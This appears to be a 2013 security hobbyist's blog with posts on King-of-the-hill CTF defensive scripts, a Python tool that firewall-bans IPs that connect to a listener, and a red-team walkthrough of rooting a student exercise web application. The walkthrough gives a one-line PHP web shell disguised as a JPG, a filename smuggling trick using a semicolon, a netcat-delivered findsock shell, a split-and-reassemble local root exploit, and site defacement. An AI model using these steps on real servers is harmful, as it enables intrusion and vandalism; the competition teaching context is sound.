Wednesday, May 15, 2013

Defensive Scripts for CTF

I did my first talk over at NoVA Hackers in Reston ( for the May monthly meeting.  Was running fumes at the time, did the slides the night before with 4 hours of sleep before work, but still knocked it out.  The talk is about what makes a good defensive script, and how can they be used, examples, and resources.  Examples included proof of concepts I developed, Unsploitable, Defense for the blind, and Wintroll by Justin Wray, Ben Heise, and others from the project.

These tools are for King of the hill style CTF's.  For example,  there are 30 machines on a given subnet, the team with the most flags planted at the end of the game wins.

Check out the talk.

Slides can be found here.
PDF Download

Monday, April 29, 2013

UMUC Presentation on Python

Download the pdf here

The two demo tools built with python can be found here.  Download pyinstaller to create an exe

Auto add scanning host to windows firewall

Auto kill foreign connection

Tuesday, April 23, 2013

Tired of nmap scans on your windows box?

Cool heres a solution, change the port as you see fit...

Create your socket listener

import socket
import sys
import os
import random

def startListen(host, port):

 # Create a TCP/IP socket
 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 # Bind the socket to the address given on the command line
 server_address = (host, port)
 print >>sys.stderr, 'starting up on %s port %s' % sock.getsockname()


Start your infinite loop, when a connect hits parse the IP and send it over to the autoBan function.

 while True:
  print >>sys.stderr, 'waiting for a connection'
  connection, client_address = sock.accept()
   print >>sys.stderr, 'client connected:', client_address
   while True:
    addr = str(client_address).replace('(','')
    addr = addr.replace('\'','')
    split = addr.split(',')
    ip = split[0]

Here is the autoban Function

def autoBan(host):
 randomNum=str(random.randrange(1, 1000000))
 command="netsh advfirewall firewall add rule name=\"BAN"+randomNum+"\" protocol=TCP action=block dir=IN remoteip="+host
 print command

Here is the main application

startListen(host, port)

 Thats cool, check out when I scan my machine with nmap default settings.

$ sudo nmap -n -vv

Starting Nmap 6.00 ( ) at 2013-04-23 21:22 EDT
Initiating ARP Ping Scan at 21:22
Scanning [1 port]
Completed ARP Ping Scan at 21:22, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:22
Scanning [1000 ports]
Discovered open port 445/tcp on
Discovered open port 22/tcp on
Discovered open port 139/tcp on
Discovered open port 135/tcp on
Increasing send delay for from 0 to 5 due to 11 out of 15 dropped probes since last increase.
Increasing send delay for from 5 to 10 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 36.60% done; ETC: 21:23 (0:00:54 remaining)
Increasing send delay for from 10 to 20 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for from 20 to 40 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for from 40 to 80 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 62.85% done; ETC: 21:24 (0:00:52 remaining)
Increasing send delay for from 80 to 160 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for from 160 to 320 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 73.30% done; ETC: 21:25 (0:00:52 remaining)
Increasing send delay for from 320 to 640 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 77.40% done; ETC: 21:26 (0:00:57 remaining)
Increasing send delay for from 640 to 1000 due to 11 out of 11 dropped probes since last increase.
SYN Stealth Scan Timing: About 80.75% done; ETC: 21:27 (0:01:00 remaining)
sSYN Stealth Scan Timing: About 83.45% done; ETC: 21:28 (0:01:02 remaining)
SYN Stealth Scan Timing: About 86.35% done; ETC: 21:29 (0:00:59 remaining)
SYN Stealth Scan Timing: About 89.05% done; ETC: 21:30 (0:00:54 remaining)
SYN Stealth Scan Timing: About 91.50% done; ETC: 21:31 (0:00:46 remaining)
SYN Stealth Scan Timing: About 93.65% done; ETC: 21:31 (0:00:36 remaining)
Completed SYN Stealth Scan at 21:33, 678.28s elapsed (1000 total ports)
Nmap scan report for
Host is up (0.00055s latency).
Scanned at 2013-04-23 21:22:17 EDT for 679s
Not shown: 996 filtered ports
22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 678.40 seconds
           Raw packets sent: 2137 (94.012KB) | Rcvd: 5 (204B)
It takes nmap 678.40 seconds to scan the machine since it dies midway....  Although it would be easy to bypass this script by just scanning windows ports, but most people are too lazy which is why this works.

Friday, April 19, 2013

Student exercise web application - How we got Root over http

Steps that occurred to gain root access a web application given as an inject is listed below. This method was used because the students were able to quickly fix the system exec commands located in the register page. The SQL injection was too tricky to try and write to the disk. Our phpMyadmin method could not be used since the schools slowly figured out that they did not need this installed. We needed to get really creative with it. All of us contributed to this solution which is a bit crazy but worked out for us.

  1. Obtained the actual VM and source code ( yes we needed an advantage as the schools has this app for an entire day, so did we =P )
  2. Discovered multiple vulnerabilities in within Register.php, Search.php, and Profile.php
  3. The logic for creating an account allowed us to write arbitrary files to disk.

      1. Create a username by the name of “Default” without quotes.
        • Create a php file with the following string <?php system($_GET["backup"])?>
        • Rename the php file with a .jpg extension to bypass the jpg file type restriction
        • Default.jpg that is located in /avatars/ is used for every new user who signs up. Its a placeholder photo.
        • The php file that is renamed to a .jpg file is uploaded it will overwrite the existing Default.jpg that resided on disk, because we created a username of Default.
        • Anytime you upload a file to the profile photo upload function, it is renamed to Profilename.jpg which allowed us to overwrite the default.jpg file.

      2. Create a username called “JimBob.php;” without quotes.
        • By adding a semicolon to the end of this username, the application copies the “Default.jpg” file with the php code we hid. The semicolon will rip off the .jpg extension. So you are now left with a file called JimBob.php.

  4. Access the php shell that we arbitrarily created by going to: YOUR COMMAND HERE
  5. Now that you have a command shell to execute commands we needed to create an interactive shell as if you were connected through SSH. Since the user www-data that apache was using did not have root privileges and were unable to easily escelate privileges to root.
  6. We created an interactive shell by using the profile photo upload function to upload files we needed to the server.
      1. We downloaded application and compiled the .c code on the same version of Ubuntu Linux
      2. We then uploaded two files, the php-findsock-shell.php file and findsock linux binary.
      3. In order to upload these files we still needed to rename each file with a .jpg extension.
      4. Each time we uploaded a file we used the JimBob.php file to rename the files we uploaded. These files needed to be uploaded by a normal username we created so it wouldn't over write our JimBob.php file.
      5. We renamed each file and moved them appropriately.
  7. Once the files were uploaded we could call our interactive Shell by using the following commands in our Bash terminal from any machine.
      1. $ nc -v 80
      2. GET /avatars/php-findsock-shell.php HTTP/1.0
      3. $ whoami
        • Output would be www-data and we now have interactive shell
  8. Escalate privileges to ROOT
      1. Since this application was running under an old version of Ubuntu, plenty of local root exploits were available. Once in which is very reliable called wunderbar_emporiumv3.
      2. We had to compile the root exploit on our VM that we created with the same version of Ubuntu. Gcc/G++ compiler was not installed on the schools vm's so we could compile anything on the host.
      3. After we compiled the exploit, the profile picture uploader was limited to 2mb files to upload. Our exploit was around 4-5mb.
        • We bypassed this by splitting the exploit binary file into 3 pieces and uploaded on piece at a time.
        • We then concatenated/appended each file together to put it back into one file through our interactive shell.
        • Chmod 777 on the file
        • ran the exploit with ./exploit
        • we now have ROOT!!! #
        • # whoami
        • # root

  1. Since we are nice guys, we decided to deface their website, without destroying their entire application. We placed an index.html file with our awesome animated GIF file thanks to other team members. Index.html takes priority over index.php.
    1. The command chattr +i ./index.html was used to make it a pain to remote the file unless they were aware of that command. We forgot to put this on RMC so RMC was able to remove theirs.
  2. We took a step further, and used the animated GIF file to overwrite every single jpg file that existed on the server with a simple BASH shell script to overwrite any file with the .jpg extension with our own.

Shine the light on some stuff i've been building

While doing more and more security comps, development of automated scripts and post exploitation was required.  In order to keep track of this, I decided to start a blog and share some of my work.  A github will be created as well once I get a hang of the licencing and such.... more to follow....